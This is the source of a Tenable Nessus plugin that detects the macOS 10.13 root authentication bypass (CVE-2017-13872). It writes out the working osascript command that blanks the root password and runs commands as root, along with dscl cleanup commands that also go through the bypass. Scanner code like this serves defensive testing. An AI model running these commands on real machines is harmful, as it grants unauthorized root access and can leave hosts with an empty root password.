
macOS 10.13 root Authentication Bypass Direct Check


The remote host is running a version of macOS that has a root authentication bypass vulnerability. A local attacker or a remote attacker with credentials for a standard user account has the ability to blank out the root account password. This can allow an attacker to escalate privileges to root and execute commands and read files as a system administrator.

#TRUSTED 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
#TRUST-RSA-SHA256 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
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin metadata registration. When the scanner loads the plugin with
# `description` set, only this branch runs: it records the attributes
# below and exits, so none of the check logic further down is reached.
if (description)
{
  script_id(104848);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/11/27");

  script_cve_id("CVE-2017-13872");
  script_bugtraq_id(101981);

  script_name(english:"macOS 10.13 root Authentication Bypass Direct Check");
  script_summary(english:"Checks if the root password can be blanked out.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a version of macOS that is affected by a
root authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of macOS that has a root
authentication bypass vulnerability. A local attacker or a remote
attacker with credentials for a standard user account has the ability
to blank out the root account password. This can allow an attacker to
escalate privileges to root and execute commands and read files as a
system administrator.");
  script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT208315");
  # The nessus.org/u? values below are shortlinks; the comment above each
  # one gives the destination it pointed to when the plugin was written.
  # https://objective-see.com/blog/blog_0x24.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2cf4b55a");
  # https://twitter.com/lemiorhan/status/935578694541770752
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ff9ff45");
  # https://www.theregister.co.uk/2017/11/28/root_access_bypass_macos_high_sierra/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1e5890f3");
  # https://www.theverge.com/2017/11/28/16711782/apple-macos-high-sierra-critical-password-security-flaw
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f367aab4");
  # https://support.apple.com/en-us/HT204012
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f9f9bbc3");
  script_set_attribute(attribute:"solution", value:
"Enable the root account and set a strong root account password.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-13872");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Mac OS X Root Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/11/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/29");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:macos");
  script_end_attributes();

  # Classed as a destructive check: the test below changes the root
  # account's state on the target (it sets, then resets, the root
  # password) rather than only reading from the host.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # ssh_get_info.nasl presumably populates the two Host/* KB keys required
  # on the next line; without them the check cannot run.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/MacOSX/Version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("ssh_func.inc");
include("macosx_func.inc");

enable_ssh_wrappers();

# The check needs an authenticated SSH session on the target; audit out
# if the scan was not configured for local checks.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# Scope the check to macOS 10.13. The regex requires "Mac OS X 10.13"
# followed by a non-digit or end of string, so 10.13 and every 10.13.x
# point release match while e.g. 10.130 would not. The version string
# alone cannot tell a patched 10.13 from an unpatched one; the direct
# test below is what actually decides.
os = get_kb_item("Host/MacOSX/Version");
if (!os) audit(AUDIT_OS_NOT, "macOS");
if (os !~ "Mac OS X 10\.13([^0-9]|$)") audit(AUDIT_OS_NOT, "macOS 10.13");

# Make sure the scanning account itself is not root. If it were, the
# "id" output captured below would report uid=0 regardless of the
# bypass and the result would be meaningless, so such hosts are skipped.
results = exec_cmd(cmd:"id");
if ("uid=0(root)" >< results)
  audit(AUDIT_HOST_NOT, "affected");

# Direct test: authenticate as root with an empty password via osascript
# and run "id". The identical command is issued twice on purpose: on an
# affected host the first invocation is what sets the empty password on
# the root account, and the second one authenticates with it and runs
# "id". The output of the first invocation is deliberately discarded.
# This is the step that changes target state; the cleanup further down
# is responsible for undoing it.
id_cmd = '/usr/bin/osascript -e \'do shell script "id" user name "root" password "" with administrator privileges\'';
results = exec_cmd(cmd:id_cmd);
# if we're vuln, the first time blanks the password, second time runs id
results = exec_cmd(cmd:id_cmd);

# No root "id" output means the bypass did not work. The audit message
# is intentionally non-committal: a configured root password and an
# applied fix look the same from here.
if ("uid=0(root)" >!< results)
{
  # not vuln
  audit(AUDIT_HOST_NOT, "vulnerable either because a root password is set or the vulnerability has been patched");
}

# The host is affected, so restore the pre-test state. Each cleanup
# command still authenticates as root with the empty password the test
# just set, then uses dscl to:
#   1. set the root passwd field to "*" (disables the root account),
#   2. delete the AuthenticationAuthority attribute,
#   3. delete ShadowHashData (the stored password hash attribute).
# The escaping on the first command is intended to get a literal "*"
# through osascript and the shell to dscl.
# NOTE(review): the results of these three commands are not checked. If
# any of them fails, the target is left with an enabled root account and
# an empty password, and the report below would not say so. Capturing
# each result and adding a warning to the report when cleanup cannot be
# confirmed would make the plugin's side effect visible to the operator.
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -create /Users/root passwd \'\\*\'" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -delete /Users/root authentication_authority" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -delete /Users/root ShadowHashData" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);

# Report evidence: the exact command that was run twice and the "id"
# output captured from the second invocation.
report = '  Nessus was able to execute commands as root by\n' +
         '  first blanking the root account password and then\n' +
         '  running "id" by using this command twice:\n' +
         '\n' +
         '  ' + id_cmd + '\n' +
         '\n' +
         '  which produced the following output:\n' +
         '\n' +
         '  ' + results + '\n';

# port:0 because this is a local (SSH-based) check, not a network service.
security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);